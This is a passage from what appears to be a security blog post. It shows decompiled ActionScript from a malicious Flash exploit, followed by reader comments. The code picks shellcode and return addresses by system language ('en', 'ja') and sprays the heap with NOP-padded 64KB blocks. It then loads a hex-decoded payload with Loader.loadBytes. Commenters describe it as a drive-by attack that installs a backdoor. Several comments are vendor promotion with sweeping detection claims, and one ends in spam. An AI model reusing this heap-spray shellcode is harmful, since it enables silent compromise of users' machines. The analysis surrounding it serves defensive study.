label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r_cn = this.hexToBin(this.t); this.ldr_cn = new Loader(); this.ldr_cn.loadBytes(this.r_cn); } // end if if (Capabilities.language.toLowerCase() == "en") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("en"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(1995123259); this.s.writeInt(3435973836); this.s.writeInt(1995172943); this.s.writeInt(3435973836); this.s.writeInt(2009141528); this.s.writeInt(2009220291); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(2009213464); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r = this.hexToBin(this.t); this.ldr = new Loader(); this.ldr.loadBytes(this.r); } // end if if (Capabilities.language.toLowerCase() == "ja") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("jp"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(2008857395); this.s.writeInt(3435973836); this.s.writeInt(2008833749); this.s.writeInt(3435973836); this.s.writeInt(2008813848); this.s.writeInt(2008892611); this.s.writeInt(3435973836); this.s.writeInt(2008885784); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // label this.s2.writeBytes(this.s, 0, this.s.length); var _loc_1: String; _loc_1.i = this.i++; } // end while trace(this.s2.length); this.i = 0; while (this.i < 176) { // label this.s3 = new ByteArray(); this.s3.writeBytes(this.s2, 0, this.s2.length); trace(this.s3.length); this.a.push(this.s3); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r_jp = this.hexToBin(this.t); this.ldr_jp = new Loader(); this.ldr_jp.loadBytes(this.r_jp); } else { trace("I am " + Capabilities.language); trace("failed"); } // end else if stop(); return; } // end function } }

8 comments:

Anonymous said...

nice work ;)

Anonymous said...

Now, this is cute. Using “normal browser behavior” and calling “no suspicious APIs” fakes out both traditional AV and heuristics-based engines. There's only one problem with this picture.

If you've seen our Security Assistant demo, you know that Security Assistant detects software as it's being downloaded and quarantines it, usually in the browser's cache, and in this scenario that's exactly what would happen. We sometimes fail to quarantine in cache if the downloader keeps a handle on the cache file, but as soon as the handle is released, we quarantine. Since the downloader must release its handle in order for the browser to execute the code, we grab it and quarantine it at handle release. Even if we failed at that point, we look at all starting processes and validate them, and nothing executing from cache can validate, so it would be blocked and immediately quarantined (so it can't try to execute again).

But “0 out of 42 antivirus vendors detected this exploit”? If you're using one of the 42, or any traditional AV product, give us a call. The only real advantage Security Assistant has over traditional AV is that Security Assistant actually works, and gives you some extremely useful tools to boot.

Doug.Finley@naknan.com

Anonymous said...

I think part of the issue here is that sofware is not getting downloaded in the normal sense. No scanner or download monitor will ever see this happening. A JPG or JP2 or JS file type is getting pulled down from the malicious site as part of a standard page load. Then other malicious scripts "execute" that JPG/JP2/Js file. I doubt that Security Assistant (or any AV product) will do deep scanning on all file types. Web surfing performance would slow to a crawl.
There are sandbox products like SanboxIE that can help to prevent an infection from taking root. There are more advanced solutions like Invincea that can isolate, detect and remediate infections that occur in a separate Vitual Machine.

But running any sort of scanner/av/anti-malware solution on the very host that is getting infected is a fool's bargain these days because they assume you can detect an infection BEFORE it can occur, and that is no longer the case.

Anonymous said...

"I doubt that Security Assistant (or any AV product) will do deep scanning on all file types."

That's where you're wrong. Security Assistant examines what's downloaded to see if it looks like software. If it does, it's quarantined. Want to see it in action?

Anonymous said...

"But running any sort of scanner/av/anti-malware solution on the very host that is getting infected is a fool's bargain these days because they assume you can detect an infection BEFORE it can occur, and that is no longer the case."

You're thinking the way all the traditional AV vendors want you to think. Detection sucks. Prevention works, but you have to have the right tool. Security Assistant examines everything that gets downloaded and reacts accordingly. You'd be surprised what we see quarantined every day from every PC in our company. And the PC users never even know something has been quarantined.

Paradigm shift.

M farhan saif said...

The vulnerability exploited is same in both the cases.. Only difference is previously Microsoft Excel was used as a vehicle to deliver the Adobe exploit while over here the same thing is being done by drive-by download attack compromising the webserver. so bottomline is, vulnerability is the same, attack vector is different.Other thing to note over here is post exploitation behaviour also differs in both cases. Here it downloads the backdoor and executes it after the vuln is exploited, while previously we saw a different binary being dropped on the system. Hence, in simpler words, post exploitation behaviour is different, the attack vector is different, while vuln being exploited remains the same.-I run Flash animations

RJ Luqman Khan said...

Thank you for such an informative post. I have been searching google for this vulnerability for a long time my friend was of the opinion it never existed. Now I can prove him wrong BUITEMS :)

AwaraRock said...

You are right They can be randomly obfuscated on-the-fly as they are served to victims. :)

how to kill lice

Post a Comment